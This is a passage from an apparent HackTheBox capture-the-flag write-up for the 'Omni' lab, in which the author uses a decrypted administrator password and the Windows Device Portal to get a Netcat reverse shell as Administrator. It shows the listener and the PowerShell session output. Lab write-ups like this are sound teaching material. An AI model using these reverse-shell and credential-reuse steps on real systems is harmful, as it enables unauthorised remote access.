Administrator
There isn’t much to privilege escalation to the administrator as I am already the SYSTEM.
But here we go
I can take advantage of the WDP service running over HTTP just like how I made the lateral movement to the app user
Authenticating as the administrator user with the decrypted password
Executing a Netcat reverse shell command
┌──(kali㉿kali)-[~/archive/htb/labs/omni]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.204] 49707
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
ps c:\windows\system32> [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
OMNI\Administrator
ps c:\windows\system32> hostname
omni
ps c:\windows\system32> ipconfig
Windows IP Configuration
ethernet adapter ethernet0:
connection-specific dns suffix . : htb
ipv6 address. . . . . . . . . . . : dead:beef::a8
ipv6 address. . . . . . . . . . . : dead:beef::f178:17b1:199:4ce4
temporary ipv6 address. . . . . . : dead:beef::f443:5df:b248:953c
link-local ipv6 address . . . . . : fe80::f178:17b1:199:4ce4%4
ipv4 address. . . . . . . . . . . : 10.10.10.204
subnet mask . . . . . . . . . . . : 255.255.255.0
default gateway . . . . . . . . . : fe80::250:56ff:feb9:eec2%4
10.10.10.2Privilege Escalation to the administrator user
Now that a valid PowerShell session has been established with the credential of the administrator user, I can continue the last decryption
i used [system.security.principal.windowsidentity]::GetCurrent().Name since whoami.exe is not available